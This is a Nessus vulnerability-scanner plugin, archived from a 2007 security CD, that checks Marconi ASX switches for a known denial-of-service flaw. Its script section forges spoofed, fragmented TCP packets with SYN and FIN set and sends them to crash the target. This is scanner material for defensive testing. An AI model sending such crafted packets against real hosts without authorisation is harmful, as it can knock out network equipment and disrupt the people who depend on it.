home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / marconi_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  104 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10635);
  10.  script_bugtraq_id(2400);
  11.  script_version ("$Revision: 1.10 $");
  12.  script_cve_id("CAN-2001-0270");
  13.  name["english"] = "Marconi ASX DoS";
  14.  name["francais"] = "Marconi ASX DoS";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "It was possible
  18. to make the remote server crash
  19. using the 'marconi dos' attack. 
  20.  
  21. An attacker may use this flaw to
  22. shut down this host, thus 
  23. preventing your network from
  24. working properly.
  25.  
  26. Solution : contact your operating
  27. system vendor for a patch.
  28.  
  29. Risk factor : High";
  30.  
  31.  
  32.  desc["francais"] = "Il s'est avΘrΘ
  33. possible de tuer la machine distante 
  34. en utilisant l'attaque 'marconis dos'.
  35.  
  36. Un pirate peut utiliser cette
  37. attaque pour empecher votre
  38. rΘseau de fonctionner normallement.
  39.  
  40. Solution : contactez le vendeur
  41. de votre OS pour un patch.
  42.  
  43. Facteur de risque : ElevΘ";
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Crashes the remote host using the 'marconi dos' attack";
  48.  summary["francais"] = "Tue le serveur distant en utilisant l'attaque 'marconi dos'";
  49.  script_summary(english:summary["english"], francais:summary["francais"]);
  50.  
  51.  script_category(ACT_KILL_HOST);
  52.  
  53.  
  54.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  55.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  56.  family["english"] = "Denial of Service";
  57.  family["francais"] = "DΘni de service";
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  
  60.  
  61.  exit(0);
  62. }
  63.  
  64. #
  65. # The script code starts here
  66. #
  67.  
  68. addr = get_host_ip();
  69. ip = forge_ip_packet(   ip_v : 4,
  70.             ip_hl : 5,
  71.             ip_tos : 0,
  72.             ip_len : 20,
  73.                 ip_id : rand(),
  74.             ip_p : IPPROTO_TCP,
  75.             ip_ttl : 255,
  76.                 ip_off : IP_MF,
  77.             ip_src : addr);
  78. port = get_host_open_port();
  79. if(!port)exit(0);
  80.             
  81. tcpip = forge_tcp_packet(    ip          : ip,
  82.                  th_sport : rand() % 65535,    
  83.                  th_dport : port,   
  84.                  th_flags : TH_SYN|TH_FIN,
  85.                      th_seq   : rand(),
  86.                  th_ack   : 0,
  87.                  th_x2    : 0,
  88.                   th_off   : 5,     
  89.                  th_win   : 512, 
  90.                  th_urp   : 0);
  91.  
  92. #
  93. # Ready to go...
  94. #
  95.              
  96. start_denial();
  97. send_packet(tcpip, pcap_active:FALSE) x 5;
  98. sleep(5);
  99. alive = end_denial();
  100. if(!alive){
  101.         set_kb_item(name:"Host/dead", value:TRUE);
  102.         security_hole(0);
  103.         }
  104.